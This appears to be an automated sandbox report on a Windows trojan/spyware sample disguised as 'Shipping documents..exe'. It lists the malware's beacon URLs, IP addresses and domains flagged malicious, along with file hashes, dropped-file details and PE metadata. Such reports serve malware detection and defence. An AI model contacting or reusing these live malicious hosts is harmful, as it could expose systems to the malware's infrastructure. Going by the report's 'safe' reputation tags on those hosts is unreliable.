http://www.huiguang.xyz/hv6g/?SvrLY=3P8lALA&DDp=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= | true | Avira URL Cloud: safe | unknown
http://www.auto-deals-cz-000.buzz/geci/?SvrLY=3P8lALA&DDp=OUcUcMiN7UFwaCotsW6AMJwehyiwg2RPC2z6ZMYslxYDHrlwQ88kbad89mN4OjllqHqnU6tumNLMTG1picng1VYsD50x98ZhJyamHAiRPzZYiWViTqiNWtopHV1ePKkjcICWV3I= | true | Avira URL Cloud: safe | unknown
http://www.beingandbecoming.ltd/79tr/?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA | true | Avira URL Cloud: safe | unknown
http://www.030002128.xyz/knx2/ | true | Avira URL Cloud: safe | unknown
http://www.d63dm.top/rqnz/?DDp=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5j7kTaNGBLKG6O6VRta8dhdFdziPB3CVN6I/2AxSEUg2RCppISrE=&SvrLY=3P8lALA | true | Avira URL Cloud: safe | unknown
http://www.servannto.site/h26k/?DDp=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcHbS91xJIfYTkMJziJL2bz2TZCx10rmCstVSToHcp1Wua4EZrnYI=&SvrLY=3P8lALA | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://dmqb.info | ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://wqxs.info | ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://piensasolutions.com/css/parking2.css | ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://anqb.top | ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wmqqb.com | ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://piensasolutions.com/imgs/parking/icon-desplegar.jpg | ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://nfqb.info | ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://dhqb.info | ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.clarity.ms/tag/ | ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo | ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://egqb.top | ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.google.comktmutil.exe, 00000006.00000002.4569488926.000000000500C000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4571566936.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000491C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://erxs.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://yqqb.xyzktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://xuaxs.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://iwqb.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://gwqqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://gdlqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://hm.baidu.com/hm.js?a1c8cf8ce51343444e7823fb95efe38ektmutil.exe, 00000006.00000002.4569488926.0000000003D34000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.0000000015A54000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensaktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wektmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_campktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.econsultoria.onlineFuFneNIzDsF.exe, 00000008.00000002.4571453200.0000000005711000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://oejqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://piensasolutions.com/imgs/parking/icon-ssl-parking.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://aqqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRuFuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003FB0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://plus.google.com/u/0/102310483732773374239ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://pmqb.xyzktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://mgnxs.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://ncxs.xyzktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cpjqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://gsxs.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://aiqb.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://gdxs.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.ecosia.org/newtab/ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://piensasolutions.com/imgs/parking/icon-hosting.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://zeqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://piensasolutions.com/imgs/parking/icon-web.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://znqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://stzqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://chqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://hgqb.xyzktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://ac.ecosia.org/autocomplete?q=ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaignktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=domktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://ozxs.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://ltqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://piensasolutions.com/imgs/parking/icon-parking.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://piensasolutions.com/imgs/parking/icon-facebook-small.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://piensasolutions.com/imgs/parking/icon-twitter-small.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://esfqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://twitter.com/piensasolutionsktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://34.92.79.175:19817/registerktmutil.exe, 00000006.00000002.4569488926.0000000003D34000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.0000000015A54000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://piensasolutions.com/imgs/parking/icon-web-sencilla.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
13.248.169.48 | www.telforce.one | United States | 16509 | AMAZON-02US | true
161.97.142.144 | www.030002128.xyz | United States | 51167 | CONTABODE | true
203.161.49.193 | www.futurevision.life | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
188.114.97.3 | www.bzxs.info | European Union | 13335 | CLOUDFLARENETUS | true
31.31.196.17 | www.servannto.site | Russian Federation | 197695 | AS-REGRU | true
103.224.182.242 | www.klohk.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
199.59.243.227 | www.auto-deals-cz-000.buzz | United States | 395082 | BODIS-NJUS | true
154.92.61.37 | www.huiguang.xyz | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
198.252.98.54 | migorengya8.click | Canada | 20068 | HAWKHOSTCA | true
154.23.184.218 | d63dm.top | United States | 174 | COGENT-174US | true
3.33.130.190 | beingandbecoming.ltd | United States | 8987 | AMAZONEXPANSIONGB | true
217.76.156.252 | www.cesach.net | Spain | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549915
Start date and time: 2024-11-06 08:38:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Shipping documents..exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@15/12
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 51
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target FuFneNIzDsF.exe, PID 6116 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: Shipping documents..exe
Time | Type | Description
02:40:04 | API Interceptor | 9642753x Sleep call for process: ktmutil.exe modified
Process: C:\Windows\SysWOW64\ktmutil.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Reputation: high, very likely benign file
                                                                                                        Process:C:\Users\user\Desktop\Shipping documents..exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):288256
                                                                                                        Entropy (8bit):7.9936799190369054
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:6144:5ZOs4Mw2mkCK2INv74qZzpLZARhryg8iOmMU7w3WcR04D:6sjw9ShptOkgemMU7hc/D
                                                                                                        MD5:D00088C0090AD25DB25DD4440F8AF2E6
                                                                                                        SHA1:4C850583ADC2F3CCEDFABBED405D88DBF93DA44E
                                                                                                        SHA-256:CFB5905A487282B41BDD24CC4598B1A4A6DAFF79C28B1DA4687D3B8486BE3634
                                                                                                        SHA-512:3759B1C510D3FBA4FCEB75AF4279F3FD7FE827219902C2D3AC8C0D609884A7019A5996646A20A9C8622A595F3F8231CAC2B6DE8AB202F447132A56135306A4EC
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:~o.e.MHSH...J...t.RD..LE...M5OCYIBGHHRG35Q7OMHSHM5OCYIBGH.RG3;N.AM.Z.l.N..h./!;r7AZ6E. h0)#[ 7y+'g:=<gZ[qs..h>')PaNTCfGHHRG35(6F.u3/../$.t" .R....1P.W...qU(.C..t(5.a\2_r-/.HM5OCYIB..HR.24Q..)SHM5OCYI.GJIYF85QcKMHSHM5OCY.VGHHBG35!3OMH.HM%OCYKBGNHRG35Q7IMHSHM5OC)MBGJHRG35Q5O..SH]5OSYIBGXHRW35Q7OMXSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5Om-,:3HHR.a1Q7_MHS.I5OSYIBGHHRG35Q7OMhSH-5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OC
                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):7.51884649812339
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:Shipping documents..exe
                                                                                                        File size:1'322'107 bytes
                                                                                                        MD5:3fbab2b42254852fc8d71f14b2862a43
                                                                                                        SHA1:51b8d33a892260ec1d0d5aee4971998756532f0c
                                                                                                        SHA256:0452cf013ff76bb1e537ac2b17b081fc2eaf7c5d302f3e838e1e854de2850896
                                                                                                        SHA512:d8fe9ea34aab1f890cdea16f2b6c081e0e9201443066cb0e3d706e093bc8df94bd2ab34eecdfbfdbcec0cdb80d69a296f75f72f122c76cdda280c9fda931ab70
                                                                                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCnYOl/SkYRg0JhFnnY01+NJ3UTh:7JZoQrbTFZY1iaCYW/3YRBhFnvF
                                                                                                        TLSH:3D55E121F5D69036C2B323B19E7FF36A963D69361327D19B23C82D325EA05416B39723
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                        Icon Hash:1733312925935517
                                                                                                        Entrypoint:0x4165c1
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                        Instruction
                                                                                                        call 00007F6F1110D79Bh
